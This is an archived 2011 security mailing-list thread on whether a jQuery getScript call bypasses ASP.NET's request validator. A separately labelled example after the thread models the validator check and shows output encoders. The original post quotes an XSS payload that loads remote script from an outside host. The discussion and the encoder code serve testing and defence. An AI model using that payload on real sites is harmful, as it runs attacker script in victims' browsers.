[WEB SECURITY] ASP.NET Request Validator Bypass?

Tasos Laskos tasos.laskos at gmail.com
Sat Feb 19 18:39:06 EST 2011


Gotta love this sort of thing though right?
As websites keep using and building upon these types of libs at some 
point we'll start to figure out the equivalent of "return to libc"-ish 
attacks for web apps.

- Tasos

On 02/19/2011 09:52 PM, Arian J. Evans wrote:
> Exactly. ASP.NET requestValidators are a server-side control.
>
> jQuery getScript is designed to be used client-side and fetch a script
> to build or interface with the DOM. Therefore the server side controls
> would never see it.
>
> ---
> Arian Evans
>
>
>
> On Sat, Feb 19, 2011 at 10:04 AM, steve jensen <sjensen1207 at hotmail.com> wrote:
>> If this jQuery .getScript request is only performed client-side, then it
>> wouldn't even be sent to the server-side ASP.NET XSS validation to be
>> bypassed.
>>
>> ________________________________
>> Date: Sat, 19 Feb 2011 15:39:06 +0000
>> From: ryandewhurst at gmail.com
>> To: websecurity at webappsec.org
>> Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?
>>
>> Hi,
>>
>> Recently on a client test I was able to bypass the ASP.NET Request Validator
>> by leveraging the jQuery library which was included in the page. I am mainly
>> a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal.
>>
>> I was wondering if anyone could confirm whether my bypass affects all
>> ASP.NET installations or whether or not this particular client had it
>> configured incorrectly.
>>
>> I used the following jQuery function to bypass the filter:
>> $.getScript('//ha.ckers.org/.j');
>>
>> Thanks,
>> Ryan
>>
>> Ryan Dewhurst
>>
>> blog www.ethicalhack3r.co.uk
>> projects www.dvwa.co.uk | www.webwordcount.com
>> twitter www.twitter.com/ethicalhack3r
>>
>> _______________________________________________ The Web Security Mailing
>> List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss Join
>> WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on
>> Twitter http://twitter.com/wascupdates websecurity at lists.webappsec.org
>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>>
>
>
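
Added example, not part of the thread and not ASP.NET's own code: a simplified model of a markup-pattern request check (assumed here to flag `<` followed by a letter, `!`, `/` or `?`, and `&#`) run over the string quoted above, next to output encoders for the HTML and JavaScript-string contexts. It shows that the quoted string contains none of the patterns such a check looks for, so encoding at output for the destination context is the control that applies to it. The function names and the two control inputs are constructed for illustration.

```javascript
// Added example, not code from the thread or from ASP.NET.
// Simplified model of a markup-pattern request check (assumption): flag "<"
// followed by a letter, "!", "/" or "?", and flag "&#".
function looksLikeMarkup(value) {
  return /<[a-zA-Z!\/?]/.test(value) || /&#/.test(value);
}

// Encode for an HTML text or quoted-attribute context.
function encodeForHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encode for a quoted JavaScript string literal: every character outside
// [A-Za-z0-9] becomes \uXXXX, so the value cannot close the literal or
// the enclosing script element.
function encodeForJsString(value) {
  let out = "";
  for (const unit of String(value).split("")) { // iterate UTF-16 code units
    out += /[A-Za-z0-9]/.test(unit)
      ? unit
      : "\\u" + unit.charCodeAt(0).toString(16).padStart(4, "0");
  }
  return out;
}

// Constructed inputs: the string quoted in the thread plus two controls.
const samples = [
  "$.getScript('//ha.ckers.org/.j');",
  "<b>hi</b>",
  "plain text",
];

// Returns the check's verdict and both encodings for each input.
function report(values) {
  return values.map((v) => ({
    value: v,
    flagged: looksLikeMarkup(v),
    html: encodeForHtml(v),
    jsString: encodeForJsString(v),
  }));
}

for (const row of report(samples)) console.log(row);
```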




